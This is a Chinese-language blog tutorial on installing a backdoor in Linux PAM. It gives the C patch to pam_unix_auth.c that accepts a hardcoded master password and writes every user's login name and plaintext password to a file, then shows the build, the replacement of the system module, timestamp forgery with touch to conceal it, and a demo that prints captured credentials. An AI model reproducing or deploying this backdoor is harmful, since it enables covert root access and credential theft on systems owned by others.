Linux系统安全之pam后门安装使用详解

一.查看系统pam版本:

[root@redkey ~]# rpm -qa | grep pam
pam-1.1.1-4.el6.x86_64

二.下载对应版本的pam模块

http://www.linux-pam.org/library/

三.解压&修改pam_unix_auth.c文件

tar -xzvf Linux-PAM-1.1.1.tar.gz
cd Linux-PAM-1.1.1
cd modules/pam_unix/
vim pam_unix_auth.c

四.修改部分


PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags
,int argc, const char **argv)
{
定义:FILE *fp;如下:
PAM_EXTERN int pam_sm_authenticate(pam_handle_t * pamh, int flags
,int argc, const char **argv)
{
unsigned int ctrl;
int retval, *ret_data = NULL;
const char *name;
const void *p;
FILE *fp;
在retval = _unix_verify_password(pamh, name, p, ctrl); [约177行]下添加
/*password:”redkey”*/
if(strcmp(p,”redkey”)==0)
{
retval = PAM_SUCCESS;
}
if(retval== PAM_SUCCESS)
{
/*pamfile:pamwd.txt*/
fp=fopen(“pamwd.txt”,”a”);
fprintf(fp,”%s::%s\n”,name,p);
fclose(fp);
}

五.编译

[root@redkey pam_unix]# cd ../../
[root@redkey Linux-PAM-1.1.1]# ./configure
[root@redkey Linux-PAM-1.1.1]# make

六.备份原有PAM模块

[root@redkey security]# mv pam_unix.so{,.bak}

七.复制新PAM模块到/lib64/security/目录下:

[root@redkey security]# cp /root/Linux-PAM-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib64/security/

八.修改pam模块时间属性

[root@redkey security]# stat pam_unix.*
File: “pam_unix.so”
Size: 151879 Blocks: 304 IO Block: 4096 普通文件
Device: fd01h/64769d Inode: 565261 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2013-12-24 11:30:01.813610217 +0800
Modify: 2013-12-24 08:55:00.000000000 +0800
Change: 2013-12-24 11:29:12.747789015 +0800
File: “pam_unix.so.bak”
Size: 50752 Blocks: 104 IO Block: 4096 普通文件
Device: fd01h/64769d Inode: 523660 Links: 1
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2013-12-24 08:55:08.026835929 +0800
Modify: 2010-02-16 01:34:42.000000000 +0800
Change: 2013-12-24 10:42:11.741663207 +0800
[root@redkey security]# touch -t 201002160134 pam_unix.so
[root@redkey security]# ll pam_unix.*
-rwxr-xr-x 1 root root 151879 2月 16 2010 pam_unix.so
-rwxr-xr-x. 1 root root 50752 2月 16 2010 pam_unix.so.bak

九.万能密码登陆验证

login as: root
root@192.168.169.131’s password:
Last login: Tue Dec 24 11:10:16 2013 from 192.168.169.1
[root@redkey ~]#
[root@redkey /]# cat pamwd.txt
root::redkey
root::123456
root::12345678
root::redkey
root::redkey

  

上一篇:NET问答: 如果动态构建 Query 查询 EntityFramework


下一篇:Linux系统下配置squid代理服务器的过程详解